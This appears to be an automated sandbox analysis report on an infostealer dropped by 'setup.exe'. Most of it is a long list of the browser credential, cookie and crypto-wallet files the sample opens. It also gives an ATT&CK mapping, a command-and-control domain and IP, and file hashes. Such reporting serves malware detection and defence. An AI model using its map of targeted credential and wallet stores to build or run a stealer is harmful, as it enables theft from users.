      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      12
      Process Injection
      11
      Masquerading
      1
      OS Credential Dumping
      21
      Security Software Discovery
      Remote Services11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      11
      Input Capture
      21
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Archive Collected Data
      2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin Shares21
      Data from Local System
      13
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS13
      File and Directory Discovery
      Distributed Component Object Model1
      Clipboard Data
      Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets25
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      setup.exe3%ReversingLabs
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\224177\Benefits.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Training0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://vividimaginatigon.top/api0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      vividimaginatigon.top
      172.67.158.151
      truetrue
        unknown
        aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTD
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://vividimaginatigon.top/apitrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XBenefits.com, 0000000C.00000000.1733371335.0000000001045000.00000002.00000001.01000000.00000008.sdmp, Benefits.com.1.dr, Verde.8.drfalse
            high
            http://nsis.sf.net/NSIS_ErrorErrorsetup.exefalse
              high
              https://www.autoitscript.com/autoit3/Benefits.com.1.dr, Verde.8.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                172.67.158.151
                vividimaginatigon.topUnited States
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1604056
                Start date and time:2025-01-31 19:48:14 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 51s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:setup.exe
                Detection:MAL
                Classification:mal96.troj.spyw.evad.winEXE@26/24@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 34
                • Number of non-executed functions: 38
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: setup.exe
                TimeTypeDescription
                13:49:08API Interceptor1x Sleep call for process: setup.exe modified
                13:49:44API Interceptor6x Sleep call for process: Benefits.com modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                172.67.158.151MsSgrmLpac.exeGet hashmaliciousUnknownBrowse
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttp://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=s1DYVAfXq0GW6Lk4FvadfsA_WbUNnbROrKLIbauDU1xUNzBDNkg0RFRSSFMwVldFOE42WVc1Wkg3Ty4uGet hashmaliciousHTMLPhisherBrowse
                  • 104.21.2.8
                  https://clickme.thryv.com/ls/click?upn=u001.y1sebFAUQE72cFLuIemaNE9QqkUqSGMnexcl4mnzcSl1rtf0On3WcCscoGkiuyUASBB-_u4suetZUr3cwQv7VcFyd1N3x5QqgQ9HrMFPRZOwvHuNVuCY104dcUZUVtZ1z8S7kN-2FX71IAly8brTgTbwT84EFGS-2FNXARw-2BtHV2WYW-2FKY3HmhhLG2ZL6MgAesy2NYzc5EYI4xSX17R3XcXLlyuygPjobmj2lDuc1P5C-2FNgDB5D26w1DU0jDJ0XvYfcp0Tlgt4kit4FohnVt4DgZPdFA8ceq5ZcCw4QHdcMP9e0ITdGhQFdK68cChoxLQOcOnpg0kvvvwYfCshsQhzMAnMNSi-2Fq61zpPq9Pb11aTq-2BYE5ib3gcPyvjJAlHpFqzDww-2FJZeQbyVfOpMOay4Cg-2B9vBdjQw-3D-3D#bWFydHkubGludGhpY3VtQGlmaXQuY29tGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.210.104
                  EFT-Remittance-Slip-for-Due-Invoice.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 104.21.64.1
                  5646654.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                  • 104.21.80.1
                  random.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 104.26.13.31
                  random.exeGet hashmaliciousVidarBrowse
                  • 172.64.41.3
                  random.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  • 104.21.18.116
                  random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, VidarBrowse
                  • 104.21.29.142
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 104.21.29.142
                  random.exeGet hashmaliciousRedLineBrowse
                  • 172.67.75.172
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, VidarBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  DJMvyf95wu.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\224177\Benefits.comrandom.exeGet hashmaliciousVidarBrowse
                    n395XXd8UE.exeGet hashmaliciousLummaC StealerBrowse
                      p199AjsEFs.exeGet hashmaliciousAmadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, StealcBrowse
                        New v2.2.0.exeGet hashmaliciousLummaC StealerBrowse
                          A_acid11.exeGet hashmaliciousLummaC StealerBrowse
                            2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                              random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, VidarBrowse
                                random.exeGet hashmaliciousVidarBrowse
                                  random.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: random.exe, Detection: malicious, Browse
                                      • Filename: n395XXd8UE.exe, Detection: malicious, Browse
                                      • Filename: p199AjsEFs.exe, Detection: malicious, Browse
                                      • Filename: New v2.2.0.exe, Detection: malicious, Browse
                                      • Filename: A_acid11.exe, Detection: malicious, Browse
                                      • Filename: 2E02vIiMfd.exe, Detection: malicious, Browse
                                      • Filename: random.exe, Detection: malicious, Browse
                                      • Filename: random.exe, Detection: malicious, Browse
                                      • Filename: random.exe, Detection: malicious, Browse
                                      • Filename: Setup.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):505966
                                      Entropy (8bit):7.999691333439623
                                      Encrypted:true
                                      SSDEEP:12288:+mrNMQZ6KFovILBRcHvDvaib1DaY633eUN7dPVldapuz:+mvvGILaWkFaY63OU1vLWk
                                      MD5:69958243BC5C2E5C6095C302B3553EA6
                                      SHA1:5290506B80C27A8390452C74180802E24A99A9E1
                                      SHA-256:BB07AF249BF75123F4101918F83DB1AC3F35BD3B25C07E24DC90F112797916DD
